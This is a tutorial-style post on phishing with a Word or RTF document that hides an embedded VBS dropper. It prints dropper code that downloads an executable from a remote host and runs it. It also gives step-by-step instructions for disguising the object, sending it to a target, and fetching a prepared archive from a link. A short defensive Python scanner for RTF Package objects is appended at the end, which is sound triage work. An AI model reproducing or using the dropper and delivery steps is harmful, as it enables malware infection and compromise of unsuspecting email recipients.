Getting people to click on your executable is an art nowadays. Even if all the hooks are set in your fake email, there is the problem that the executable itself cannot be sent. A good choice is to create a Word document (.doc) or a Rich Text Format (.rtf) file and insert an object.
For this article I used a common VBS dropper that was configured to download and execute after the user double-clicks the object inside the document.
Most people think that Word documents are only harmful if macros are enabled; they are wrong.
101 lesson
1 - Let's do this. Save the following code as file.vbs
- Code:
dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", "http://127.0.0.1/1.exe", False
xHttp.Send
with bStrm
.type = 1 '
.open
.write xHttp.responseBody
.savetofile "C:\Windows\temp\file.exe", 2 '
end with
Set objShell = WScript.CreateObject("WScript.Shell")
objShell.Run("C:\Windows\temp\file.exe"), 1, True
2 - Change http://127.0.0.1/1.exe to your remote file and keep C:\Windows\temp\file.exe as it is.
(Use your own exe instead of file.vbs, as it is detected. This is for demo purposes only.)
3 - Open Wordpad or Winword (in this example, I'm using Wordpad).
4 - Create a good document with a logo and add as many elements as you can to make it believable like signature, etc.
5 - Write the sentence "Double click below if not showing the image"
6 - And then click on "Insert a object"
7 - Select "Create from file" and select the vbs file
8 - Right click in the icon and "Packager Shell Object Object" > "Rename Package" and remove the "label"
9 - Save the document and send as attachment to your target email.
Note: This method only works on non-technical people. It works because users have more trust in clicking a link inside a document than in clicking directly on an exe.
Download:
https://nitro.download/view/B7775A889651C87/Document.rar
Virus scan: file.vbs is flagged as malicious.
The document was not scanned, to avoid disclosing the method.
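For attachment triage, an added example (not part of the original post) that flags RTF files carrying an OLE Package object whose data stores a script or executable file name. It is a heuristic string scan over the hex-decoded `\objdata`; `make_sample` builds a constructed, simplified object with an empty label (mirroring step 8) and no payload, and the extension list is an assumption to tune.

```python
import re

# Script and executable extensions with no business being packaged in a document.
RISKY_EXT = ("vbs", "vbe", "js", "jse", "wsf", "hta", "bat", "cmd", "ps1", "lnk", "scr", "exe")

# \objdata carries the embedded object as hex text inside the RTF group.
OBJDATA_RE = re.compile(rb"\\objdata\b([^{}\\]*)")
# Printable run ending in a risky extension and terminated by NUL (a stored file name/path).
NAME_RE = re.compile(
    rb"[\x20-\x7e]{1,260}\.(?:" + "|".join(RISKY_EXT).encode() + rb")(?=\x00)", re.I)


def decode_objdata(blob):
    """Hex-decode an objdata payload, skipping the whitespace RTF allows inside it."""
    hexchars = re.sub(rb"[^0-9A-Fa-f]", b"", blob)
    return bytes.fromhex(hexchars[: len(hexchars) // 2 * 2].decode("ascii"))


def scan_rtf(rtf):
    """Return one finding per embedded Package object, with any risky file names found."""
    findings = []
    for m in OBJDATA_RE.finditer(rtf):
        data = decode_objdata(m.group(1))
        # The OLE 1.0 header inside the data names the class; check it there
        # rather than relying on the separate objclass control word.
        if b"Package\x00" not in data[:64]:
            continue
        names = sorted({n.group(0).decode("latin-1") for n in NAME_RE.finditer(data)})
        findings.append({"offset": m.start(), "names": names, "risky": bool(names)})
    return findings


def make_sample(path):
    """Constructed, simplified test object: Package header, empty label, stored path, no payload."""
    ole = (b"\x01\x05\x00\x00\x02\x00\x00\x00" + b"\x08\x00\x00\x00Package\x00"
           + b"\x00" * 8 + b"\x02\x00" + b"\x00" + path + b"\x00")
    return (b"{\\rtf1{\\object\\objemb{\\*\\objclass Package}{\\*\\objdata "
            + ole.hex().encode("ascii") + b"}}}")


if __name__ == "__main__":
    for p in (b"C:\\Users\\demo\\Desktop\\file.vbs", b"C:\\Users\\demo\\Desktop\\logo.png"):
        print(scan_rtf(make_sample(p)))
```

A Package object with no risky name is still reported (with `risky` set to false), since any packaged file in an inbound document is worth a second look.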